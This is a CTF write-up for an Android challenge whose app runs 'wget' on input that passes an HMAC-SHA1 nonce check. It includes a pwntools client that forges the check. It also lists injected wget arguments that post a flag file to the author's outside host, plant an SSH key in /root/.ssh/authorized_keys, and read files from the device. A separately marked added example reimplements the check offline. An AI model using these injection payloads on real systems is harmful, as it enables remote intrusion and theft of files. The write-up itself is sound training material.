xctf University "Fight the Epidemic" CTF - Android GetFlag writeup
Frank
GetFlag
➜ assets cat secret.txt | base64 -D
The%20IP%20of%20the%20remote%20phone%20is%20212.64.66.177%
➜ assets ping 212.64.66.177
PING 212.64.66.177 (212.64.66.177): 56 data bytes
64 bytes from 212.64.66.177: icmp_seq=0 ttl=48 time=82.547 ms
64 bytes from 212.64.66.177: icmp_seq=1 ttl=48 time=34.481 ms
^C
--- 212.64.66.177 ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/stddev = 34.481/58.514/82.547/24.033 ms
➜ assets curl 212.64.66.177:8080
46502
The remote apk runs a MainActivity$ServerSocket_thread class.
Once started it listens on port 8080. For each connection it receives a JSON string, computes an HMAC-SHA1 of "message" using a random number's .toString() as the nonce (the key), compares the result with "check", and then outputs the result.
The key is only sent down after you connect.
They give you a wget, so the arguments have to be concatenated onto it.
import hmac
import hashlib
import json
from pwn import remote

def make_digest(message, key):
    key = bytes(key, 'UTF-8')
    message = bytes(message, 'UTF-8')
    digester = hmac.new(key, message, hashlib.sha1)
    return digester.hexdigest()

def execute(cmd): # server side runs getRuntime().exec("wget "+cmd);
    payload = {'message': cmd}
    x = remote('212.64.66.177', 8080)
    # the server sends the nonce first; it is the HMAC key for this connection
    payload['check'] = make_digest(payload['message'], str(int(x.recv().decode())))
    x.sendline(json.dumps(payload))
    x.close()
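Added example, not the author's code: both halves of the check described above, reimplemented in Python so the whole exchange can be run in-process without a network. The field names message/check, the HMAC-SHA1 hex digest and the nonce-as-key come from the writeup; the nonce range and all function names here are assumptions.

```python
import hmac
import hashlib
import json
import secrets

def make_check(message: str, nonce: str) -> str:
    """Client side: HMAC-SHA1 hex digest of message, keyed with the nonce string."""
    return hmac.new(nonce.encode("utf-8"), message.encode("utf-8"), hashlib.sha1).hexdigest()

def new_nonce() -> str:
    """Server side: the app used a random number's toString() as the key.
    Constructed stand-in; the exact range the app used is not on the page."""
    return str(secrets.randbelow(2**31))

def verify_request(raw_json: str, nonce: str) -> tuple:
    """Server side: parse {"message", "check"} and test check == HMAC-SHA1(nonce, message).
    Returns (ok, message). compare_digest avoids a byte-by-byte timing leak of the digest."""
    try:
        req = json.loads(raw_json)
        message = req["message"]
        check = req["check"]
    except (ValueError, KeyError, TypeError):
        return (False, None)
    if not isinstance(message, str) or not isinstance(check, str):
        return (False, None)
    expected = make_check(message, nonce)
    # Note: the nonce is handed to whoever connects, so a valid check only shows the body
    # was not altered after the nonce was received; it says nothing about who sent it.
    return (hmac.compare_digest(expected, check.lower()), message)

def simulate_exchange(message: str, tamper: bool = False) -> bool:
    """Run both halves in-process: server issues nonce, client answers, server verifies."""
    nonce = new_nonce()                      # server -> client
    payload = {"message": message, "check": make_check(message, nonce)}
    if tamper:
        payload["message"] = message + " -x"  # body changed after the check was computed
    ok, _ = verify_request(json.dumps(payload), nonce)   # client -> server
    return ok

if __name__ == "__main__":
    print(simulate_exchange("http://example.invalid/"))       # constructed message
    print(simulate_exchange("http://example.invalid/", True))
```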
I tried several approaches; all of them worked locally (AC) but failed on submission (RE):
--execute output_document=/root/.ssh/authorized_keys http://v4w.frankli.site:1234/id_rsa.pub
--post-file flag http://v4w.frankli.site:1345/
--execute base=http://v4w.frankli.site:1234/ -i flag
The last approach above can read files, but I did not know the path of the flag.
For example, it can read /default.prop.
All of the payloads above can read
/data/data/com.xuanxuan.getflag/files/flag
flag{this_wget_is_from_termux_and_I_move_some_dynamic_lib_to_systemlib_to_run_it}